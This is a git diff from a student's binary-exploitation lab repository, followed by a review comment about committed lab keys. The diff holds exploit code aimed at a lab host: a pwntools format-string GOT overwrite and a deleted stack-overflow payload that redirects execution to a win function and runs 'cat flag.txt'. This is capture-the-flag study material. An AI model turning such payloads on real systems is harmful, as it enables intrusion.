diff --git a/4/level10/test.py b/4/level10/test.py
index c608ca3..115e673 100644
--- a/4/level10/test.py
+++ b/4/level10/test.py
@@ -15,8 +15,10 @@ print("win : ", hex(win_addr))
 #for i in range(1,30):
 #print("##################### ", i)
-p = process(elf.path)
-#p = remote("localhost", 4010)
+#p = process(elf.path)
+p = remote("binexp.stud12.hacklab.ias.tu-bs.de", 4010)
+payload = "hacklab{ret2libc_1s_p0w3rful_urPDIYAb}"
+p.sendline(payload.encode())
 context.clear(arch = 'amd64')
 payload = fmtstr_payload(offset=8, writes={exit_got: win_addr})
diff --git a/4/level11/test b/4/level11/test
deleted file mode 100644
index 9517151..0000000
--- a/4/level11/test
+++ /dev/null
@@ -1,7 +0,0 @@
-last key
-32 byte filler
-overwrite rbp with sane address (doesnt need to be specific, just dont segfault bc of memory region)
-overwrite rip with address of win
-
-#printf 'hacklab{why_c4n7_y0u_ju57_d0_th3_m4th_eBPiC6YB}\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x90\xde\xff\xff\xff\x7f\x00\00\x96\x11\x40\00\00\00\00\00\ncat flag.txt\n' > input.txt
-printf 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x90\xde\xff\xff\xff\x7f\x00\00\x56\x13\x40\00\00\00\00\00\ncat flag.txt\n'
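Review bot: The added `payload = "hacklab{ret2libc_1s_p0w3rful_urPDIYAb}"` line commits a live level key to the repository right next to the target hostname, so anyone with read access to the repo can authenticate to that service; read it from the environment or a gitignored file instead, e.g. `key = os.environ["LEVEL10_KEY"]` followed by `p.sendline(key.encode())` (assuming `os` is in scope, which `from pwn import *` would provide). Reusing the name `payload` for both the key and the later `fmtstr_payload(...)` result invites sending the wrong value to the socket; a distinct name such as `key` removes that ambiguity. Switching the target by commenting out `p = process(elf.path)` also means every run now needs network access to the remote host; a pwntools `args.REMOTE`-style switch would keep the local path usable without editing the file. The hunk header (`-15,8 +15,10`) implies two more context lines than appear here, so this hunk likely continues past the excerpt.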